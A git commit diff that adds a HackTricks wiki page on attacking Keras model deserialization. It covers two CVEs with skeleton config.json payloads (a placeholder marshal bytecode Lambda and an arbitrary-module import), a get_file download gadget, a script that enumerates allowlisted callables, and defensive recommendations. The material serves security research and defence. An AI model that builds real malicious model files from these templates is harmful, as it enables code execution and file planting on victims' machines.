Merge pull request #1313 from HackTricks-wiki/update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658

carlospolop · web-flow · commit 1624c21cd4fe · 2025-08-22T02:05:10.000+02:00
Hunting Vulnerabilities in Keras Model Deserialization
diff --git a/src/AI/AI-Models-RCE.md b/src/AI/AI-Models-RCE.md
@@ -177,11 +177,20 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
     tf.add(PAYLOAD)                      # rides the symlink
 ```
 
+### Deep-dive: Keras .keras deserialization and gadget hunting
+
+For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, and post-fix gadget discovery inside the allowlist, see:
+
+
+{{#ref}}
+../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
+{{#endref}}
+
 ## References
 
 - [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
 - [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
 - [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
 - [PyTorch – security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
 
-{{#include ../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -69,6 +69,7 @@
   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md)
   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
+  - [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md)
   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md)
   - [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
   - [venv](generic-methodologies-and-resources/python/venv.md)
diff --git a/src/generic-methodologies-and-resources/python/README.md b/src/generic-methodologies-and-resources/python/README.md
@@ -7,6 +7,7 @@
 
 - [**Pyscript hacking tricks**](pyscript.md)
 - [**Python deserializations**](../../pentesting-web/deserialization/README.md)
+- [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md)
 - [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md)
 - [**Basic python web requests syntax**](web-requests.md)
 - [**Basic python syntax and libraries**](basic-python.md)
diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
@@ -0,0 +1,219 @@
+# Keras Model Deserialization RCE and Gadget Hunting
+
+{{#include ../../banners/hacktricks-training.md}}
+
+This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets.
+
+## .keras model format internals
+
+A .keras file is a ZIP archive containing at least:
+- metadata.json – generic info (e.g., Keras version)
+- config.json – model architecture (primary attack surface)
+- model.weights.h5 – weights in HDF5
+
+The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries.
+
+Example snippet for a Dense layer object:
+
+```json
+{
+  "module": "keras.layers",
+  "class_name": "Dense",
+  "config": {
+    "units": 64,
+    "activation": {
+      "module": "keras.activations",
+      "class_name": "relu"
+    },
+    "kernel_initializer": {
+      "module": "keras.initializers",
+      "class_name": "GlorotUniform"
+    }
+  }
+}
+```
+
+Deserialization performs:
+- Module import and symbol resolution from module/class_name keys
+- from_config(...) or constructor invocation with attacker-controlled kwargs
+- Recursion into nested objects (activations, initializers, constraints, etc.)
+
+Historically, this exposed three primitives to an attacker crafting config.json:
+- Control of what modules are imported
+- Control of which classes/functions are resolved
+- Control of kwargs passed into constructors/from_config
+
+## CVE-2024-3660 – Lambda-layer bytecode RCE
+
+Root cause:
+- Lambda.from_config() used python_utils.func_load(...) which base64-decodes and calls marshal.loads() on attacker bytes; Python unmarshalling can execute code.
+
+Exploit idea (simplified payload in config.json):
+
+```json
+{
+  "module": "keras.layers",
+  "class_name": "Lambda",
+  "config": {
+    "name": "exploit_lambda",
+    "function": {
+      "function_type": "lambda",
+      "bytecode_b64": "<attacker_base64_marshal_payload>"
+    }
+  }
+}
+```
+
+Mitigation:
+- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False.
+
+Notes:
+- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders.
+
+## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8
+
+Root cause:
+- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json.
+- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs.
+
+Exploit idea:
+
+```json
+{
+  "module": "maliciouspkg",
+  "class_name": "Danger",
+  "config": {"arg": "val"}
+}
+```
+
+Security improvements (Keras ≥ 3.9):
+- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp
+- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading
+- Basic type checking: deserialized objects must match expected types
+
+## Post-fix gadget surface inside allowlist
+
+Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.
+
+Gadget via Lambda that references an allowed function (not serialized Python bytecode):
+
+```json
+{
+  "module": "keras.layers",
+  "class_name": "Lambda",
+  "config": {
+    "name": "dl",
+    "function": {"module": "keras.utils", "class_name": "get_file"},
+    "arguments": {
+      "fname": "artifact.bin",
+      "origin": "https://example.com/artifact.bin",
+      "cache_dir": "/tmp/keras-cache"
+    }
+  }
+}
+```
+
+Important limitation:
+- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
+
+Potential impacts of allowlisted gadgets:
+- Arbitrary download/write (path planting, config poisoning)
+- Network callbacks/SSRF-like effects depending on environment
+- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists
+
+## Researcher toolkit
+
+1) Systematic gadget discovery in allowed modules
+
+Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.
+
+```python
+import importlib, inspect, pkgutil
+
+ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"]
+
+seen = set()
+
+def iter_modules(mod):
+    if not hasattr(mod, "__path__"):
+        return
+    for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."):
+        yield m.name
+
+candidates = []
+for root in ALLOWLIST:
+    try:
+        r = importlib.import_module(root)
+    except Exception:
+        continue
+    for name in iter_modules(r):
+        if name in seen:
+            continue
+        seen.add(name)
+        try:
+            m = importlib.import_module(name)
+        except Exception:
+            continue
+        for n, obj in inspect.getmembers(m):
+            if inspect.isfunction(obj) or inspect.isclass(obj):
+                sig = None
+                try:
+                    sig = str(inspect.signature(obj))
+                except Exception:
+                    pass
+                doc = (inspect.getdoc(obj) or "").lower()
+                text = f"{name}.{n} {sig} :: {doc}"
+                # Heuristics: look for I/O or network-ish hints
+                if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]):
+                    candidates.append(text)
+
+print("\n".join(sorted(candidates)[:200]))
+```
+
+2) Direct deserialization testing (no .keras archive needed)
+
+Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.
+
+```python
+from keras import layers
+
+cfg = {
+  "module": "keras.layers",
+  "class_name": "Lambda",
+  "config": {
+    "name": "probe",
+    "function": {"module": "keras.utils", "class_name": "get_file"},
+    "arguments": {"fname": "x", "origin": "https://example.com/x"}
+  }
+}
+
+layer = layers.deserialize(cfg, safe_mode=True)  # Observe behavior
+```
+
+3) Cross-version probing and formats
+
+Keras exists in multiple codebases/eras with different guardrails and formats:
+- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion)
+- tf-keras: maintained separately
+- Multi-backend Keras 3 (official): introduced native .keras
+
+Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
+
+## Defensive recommendations
+
+- Treat model files as untrusted input. Only load models from trusted sources.
+- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
+- Do not set safe_mode=False when loading models unless you fully trust the file.
+- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
+- Enforce allowlists/signatures for model sources and integrity checking where possible.
+
+## References
+
+- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
+- [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751)
+- [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660)
+- [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)
+- [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e)
+- [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3)
+
+{{#include ../../banners/hacktricks-training.md}}